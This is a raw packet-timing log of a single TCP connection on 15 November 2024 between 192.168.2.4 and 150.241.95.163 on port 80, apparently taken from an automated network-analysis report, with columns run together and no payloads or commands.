                                                                                                                                                                Nov 15, 2024 10:28:17.244235992 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.244275093 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.244291067 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.244309902 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.244357109 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.244486094 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.244541883 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.244576931 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.244590998 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.249684095 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.249721050 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.249742985 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.249756098 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.249800920 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.264040947 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.264082909 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.264134884 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.264137983 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.264175892 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.264209986 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.264219046 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.264245987 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.264287949 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.264719963 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.264774084 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.264808893 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.264820099 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.274929047 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.274983883 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.275006056 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.275018930 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.275053024 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.275064945 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.275088072 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.275137901 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.358758926 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.358814001 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.358853102 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.358983040 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.358984947 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.359040976 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.359041929 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.359076977 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.359121084 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.359164953 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.360589027 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.360644102 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.360683918 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.360719919 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.360898018 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.360898018 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.367455959 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.367495060 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.367513895 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.367528915 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.367579937 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.367614985 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.367650986 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.367685080 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.367692947 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.367692947 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.367729902 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.368177891 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.368310928 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.368359089 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.372970104 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.373003960 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.373037100 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.373059034 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.387362957 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.387417078 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.387433052 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.387450933 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.387485027 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.387518883 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.387619019 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.387619019 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.387820005 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.387873888 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.387908936 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.387921095 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.388196945 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.388230085 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.388252020 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.388263941 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.388305902 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.398098946 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.398138046 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.398171902 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.398200989 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.398411036 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.398444891 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.398462057 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.398483038 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.398525000 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.481755018 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.481792927 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.481827021 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.481862068 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.482235909 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.482286930 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.482292891 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.482327938 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.482372046 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.483829021 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.483863115 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.483896017 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.483915091 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.490642071 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.490686893 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.490716934 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.490722895 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.490770102 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.491180897 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.491235018 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.491269112 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.491285086 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.491301060 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.491349936 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.491357088 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.496109009 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.496144056 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.496176004 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.496179104 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.496227980 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.510690928 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.510750055 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.510799885 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.510807991 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.510835886 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.510870934 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.510881901 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.511087894 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.511137009 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.511286974 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.511353970 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.511388063 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.511399031 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.511420965 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.511456966 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.511465073 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.512155056 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.512217045 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.521258116 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.521313906 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.521363020 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.521428108 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.521481037 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.521513939 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.521526098 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.567418098 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.605232000 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.605278969 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.605314970 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.605334044 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.605349064 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.605381966 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.605391979 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.605508089 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.605537891 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.605554104 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.606976032 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.607009888 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.607023954 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.607043028 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.607084990 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.613815069 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.613850117 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.613882065 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.613913059 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.613992929 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.614036083 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.614093065 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.614128113 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.614162922 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.614171982 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.614695072 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.614727974 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.614739895 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.614762068 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.614801884 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.619245052 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.619276047 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.619334936 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.619379044 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.619409084 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.619452000 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.634035110 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.634088039 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.634120941 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.634150028 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.634154081 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.634190083 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.634203911 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.634409904 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.634444952 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.634466887 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.634480000 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.634525061 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.634530067 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.634563923 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.634603977 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.635449886 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.635483980 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.635514975 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.635525942 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.644493103 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.644539118 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.644567013 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.644577980 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.644613028 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.644618988 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.644646883 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.644680023 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.644685030 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.692440987 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.728341103 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.728391886 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.728429079 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.728538036 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.729057074 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.729094028 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.729111910 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.729126930 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.729172945 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.737153053 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.737206936 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.737261057 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.737262964 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.737294912 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.737341881 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.737349033 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.737382889 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.737416983 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.737425089 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.737449884 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.737493038 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.739351034 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.739428043 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.739461899 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.739491940 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.739495039 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.739530087 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.739543915 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.742839098 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.742877007 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.742902994 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.742912054 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.742954016 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.757277966 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.757334948 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.757368088 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.757385969 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.757401943 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.757436037 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.757446051 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.757635117 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.757668972 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.757684946 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.757703066 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.757750034 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.757996082 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.758157969 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.758189917 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.758207083 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.758224010 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.758255959 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.758266926 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.758948088 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.759000063 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.759001970 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.767952919 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.768003941 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.768033981 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.768052101 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.768076897 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.768125057 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.768157959 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.768166065 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.768191099 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.768205881 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.768249035 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.863854885 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.863899946 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.863934994 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.863967896 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.863976955 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.864002943 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.864021063 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.864056110 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.864108086 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.864110947 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.864140987 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.864176035 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.864185095 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.864211082 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.864269972 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.864880085 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.864933014 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.864979029 CET4973680192.168.2.4150.241.95.163
